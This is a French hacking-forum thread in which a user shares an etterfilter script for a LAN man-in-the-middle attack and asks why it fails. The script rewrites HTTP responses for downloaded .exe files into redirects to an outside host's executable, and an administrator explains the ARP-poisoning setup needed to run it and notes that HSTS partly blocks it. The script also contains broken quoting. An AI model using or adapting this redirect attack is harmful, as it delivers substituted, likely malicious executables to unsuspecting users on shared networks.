Auteur Sujet: EtterFilter Script  (Lu 7845 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne shift75
  • Contributeur de Kali-linux.fr
  • Membre Junior
  • *****
  • Messages: 46
  • +1/-0
EtterFilter Script
« le: 04 mai 2013 à 22:24:14 »
Bonsoir à tous,

Je souhaiterais avoir une information concernant les scripts etterfiler permettant de remplacer sur un LAN les .EXE télécharger par les utilisateurs.
Les forums parlant beaucoup de ce type d'attaque date de 2008 à peu pret .Cette attque fonctionne-t-elle toujours ?
J'ai tenter de la lancer sur un LAN privé rien a faire cela ne fonctionne pas du tout.

Merci

Hors ligne shift75
  • Contributeur de Kali-linux.fr
  • Membre Junior
  • *****
  • Messages: 46
  • +1/-0
Re : EtterFilter Script
« Réponse #1 le: 04 mai 2013 à 23:32:59 »
Merci pour cette réponse cela va me faire de la lecture.

Le but est de :

Sur un LAN lancer le script en question qui aura pour but de remplacer n'importe quels fichiers .exe que pourra télécharger quelqu'un du réseau.
L'utilisateur A télécharge un .EXE le filter (avec etterfilter) lui indique que le fichier EXE a changer d'emplacement).

Voici le script en question:

CODE
# replace rmccurdy with your website
# replace the url with what ever exe you like





if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");

}



if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.rmccurdy.com/scripts/quickclean.exe
");
msg("redirect success\n");

}
}

Jusqu'a présent impossible à faire fonctionner...

Hors ligne admin
  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 1685
  • +74/-3
    • Communauté FR de Kali-linux
Re : EtterFilter Script
« Réponse #2 le: 05 mai 2013 à 11:26:51 »
Salut,

Le principe de cette attaque est simple, il s'agit d'effectuer tout d'abord de l'ARP poisonning afin de mettre le PC de hack entre la victime et le serveur (MITM attack). A partir de la, ton script permet de modifier les paquets HTTP à la volée (en temps réel) afin de faire croire au client que le fichier distant (un .exe dans le cas présent) à changer d'emplacement (remplacement du code HTTP "200 OK" par "301 Moved Permanently) et qu'il faut désormais aller le rechercher à une autre adresse HTTP (que le pirate aura prédéfini vers un .exe vérolé).

J'ai pu lire que les navigateurs savent maintenant (sauf IE et Opéra d'après cette source non vérifiée) éviter ce type d'attaque via le protocole HSTS [http://dev.chromium.org/sts].

Je n'ai pas (encore) testé mais je pense que cela fonctionne toujours en HTTP mais pas en HTTPS (avec SSLSTRIP).

Si besoin, je peux tester et rédiger un tuto dans la semaine (ça m'intéresse).

Tenez moi au jus de l'avancement de vos recherches.

++

Hors ligne shift75
  • Contributeur de Kali-linux.fr
  • Membre Junior
  • *****
  • Messages: 46
  • +1/-0
Re : EtterFilter Script
« Réponse #3 le: 07 mai 2013 à 17:10:09 »
Bonjour,

Oui effectivement je serais très intéresser par ce tuto, parceuque j'ai tenter de retourner le script dans tous les sens et rien a faire cela ne fonctionne pas donc je pense en effet que les navigateurs doivent être protéger contre cela...La partie MITM et ARP poisonning ne me pose aucun soucis c'est vraiment la partie de modif du paquet à la volé avec redirection qui est bloquante.
En attendant vos réponses.